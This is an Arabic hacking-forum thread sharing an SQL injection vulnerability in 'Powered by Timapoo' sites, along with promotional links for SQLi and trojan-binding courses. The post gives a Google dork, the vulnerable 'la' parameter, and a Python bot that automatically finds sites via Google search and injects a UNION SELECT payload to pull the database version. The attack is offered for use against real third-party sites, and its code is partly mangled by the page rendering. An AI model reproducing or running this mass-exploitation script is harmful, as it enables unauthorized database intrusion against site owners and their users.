1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] Powered by Timapoo sql injection

الموضوع في '[ الـثـغـرات ]' بواسطة Fox, بتاريخ ‏3 مايو 2014.

كاتب الموضوع : Fox المشاهدات : 490 الردود : 2 ‏3 مايو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Fox
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم

    السلام عليكم اخواني

    الثغرا من اكتشاف SoUiLaHxXx_Dz

    كود PHP:
    ####################################################################################
    # Title : Powered by Timapoo [sql injection]
    # Author : SoUiLaHxXx_Dz
    # Date : 06-20-2013
    ####################################################################################

    Dork :
     
    inurl:"dynamic.php?sys=faq" Powered by Timapoo

    exploit 
    :
     
    http://site/dynamic.php?sys=faq&action=new&la=[SQL]
    الاخ UzunDz نشر بوت واستغلال لها..

    كود PHP:
    #!C:\Python27\python.exe 
    '''  
        by Ali , UzunDz 
        UzunDz[at]gmail[dot]com 
        Sec4ever.com , dz-root.com 
        x00x-Team. 
        Vuln : Timapoo SQLi 
    ''' 
    from google import search 
    import urllib2
    ,re 

    def exploit_url
    (url): 
        try : 
            
    exp "dynamic.php?sys=faq&la=' div 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x555a55,version(),0x4e445a),14,15,16%23" 
            
    target re.sub('dynamic.php(.*)','',url
            print 
    "Trying to inject : "+target 
            run 
    urllib2.urlopen(target+exp.replace(' ','%20')).read() 
            print 
    "Version : "+re.findall('UZU(.*)NDZ',run)[0
        
    except 
            
    pass 

    dork 
    'inurl:"dynamic.php?sys=faq" Powered by Timapoo' 
    for url in search(dork,stop=(100)): 
        if 
    'dynamic.php' in url
            
    exploit_url(url)

     


    جاري تحميل الصفحة...
  2. غير متصل

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏21 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: Powered by Timapoo sql injection

    يعطيك العافية ~
     


  3. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: Powered by Timapoo sql injection

    شكراً جزيلاً
    {1!$8}
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...